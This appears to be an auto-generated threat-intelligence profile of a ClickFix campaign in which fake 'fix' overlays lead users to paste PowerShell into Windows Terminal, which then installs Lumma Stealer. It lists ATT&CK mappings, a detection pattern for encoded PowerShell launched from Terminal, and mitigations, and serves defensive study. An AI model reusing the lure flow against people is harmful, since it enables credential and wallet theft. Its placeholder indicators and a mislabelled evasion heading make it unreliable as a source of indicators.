Full Report
Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command
Analysis Summary
# Tool/Technique: ClickFix (Windows Terminal Variant)
## Overview
ClickFix is a sophisticated social engineering technique that tricks users into executing malicious commands by masquerading as a technical support fix for common software issues (e.g., browser errors or document viewing problems). This specific variant replaces the traditional "Windows Run" (Win+R) execution method with the **Windows Terminal** app to bypass user suspicion and launch a multi-stage attack chain ending in credential theft.
## Technical Details
- **Type**: Social Engineering Technique / Malware Delivery Mechanism
- **Platform**: Windows 10/11
- **Capabilities**: Command injection, PowerShell execution, remote payload delivery, credential/data exfiltration.
- **First Seen**: February 2026 (Activity observed)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (Fake error overlays)
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1204.002 - User Execution: Malicious File/Command
- **TA0007 - Discovery**
- T1082 - System Information Discovery
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Deceptive Overlays**: Displays hyper-realistic "Fix" buttons on compromised or malicious websites when a browser error is simulated.
- **Clipboard Hijacking**: Automatically copies a malicious PowerShell command to the user's clipboard after they click a "Fix" or "Copy" button.
- **Terminal Exploitation**: Directs the user to open the modern Windows Terminal app (wt.exe) as a trusted environment to paste and run the malicious string.
### Advanced Features
- **Persistence Bypass**: By utilizing Windows Terminal, the attack avoids some older detection heuristics focused specifically on the legacy `cmd.exe` or `Run` dialog.
- **Obfuscated Payloads**: The PowerShell commands typically involve Base64 encoding or multi-stage downloads to evade static signature scanning.
- **Lumma Stealer Integration**: Serves as the primary delivery vehicle for Lumma Stealer, which targets browser passwords, cookies, and crypto wallets.
## Indicators of Compromise
- **File Names**: `wt.exe` (Windows Terminal - legitimate binary used maliciously), `Lumma.exe` (or variant names).
- **Network Indicators**:
- `hxxps[:]//[random-subdomain].clickfix[.]com`
- `hxxp[:]//[c2-address-defanged]/api/v4/`
- **Behavioral Indicators**:
- Spawning of `powershell.exe` as a child process of `WindowsTerminal.exe`.
- Content copied to clipboard originating from a web browser containing `powershell -ExecutionPolicy Bypass`.
- Unusual outbound connections to known Lumma C2 nodes following Terminal usage.
## Associated Threat Actors
- **Storm-1575** (Commonly associated with ClickFix infrastructure)
- **Lumma Stealer Operators**
## Detection Methods
- **Behavioral detection**: Monitor for parent-child relationships where `WindowsTerminal.exe` or `wt.exe` launches PowerShell with encoded command flags.
- **Clipboard Monitoring**: Security tools (EDR) detecting scripts or suspicious PowerShell code being moved from browser memory to the system clipboard.
- **Network Monitoring**: Identifying traffic to known ClickFix-related domains and Lumma Stealer communication patterns.
## Mitigation Strategies
- **Prevention measures**: Implement "Attack Surface Reduction" (ASR) rules to block process creations from Office or web browsers.
- **User Education**: Train users to never paste commands from websites into Terminal or Command Prompt, regardless of the "support" instructions.
- **Hardening recommendations**: Restrict PowerShell execution policies to `AllSigned` and enforce the use of Constrained Language Mode where possible.
## Related Tools/Techniques
- **ClearFake**: A similar social engineering framework using fake browser updates.
- **Lumma Stealer**: The information stealer deployed as the final payload.
- **Win+R ClickFix**: The predecessor technique utilizing the Windows Run dialog.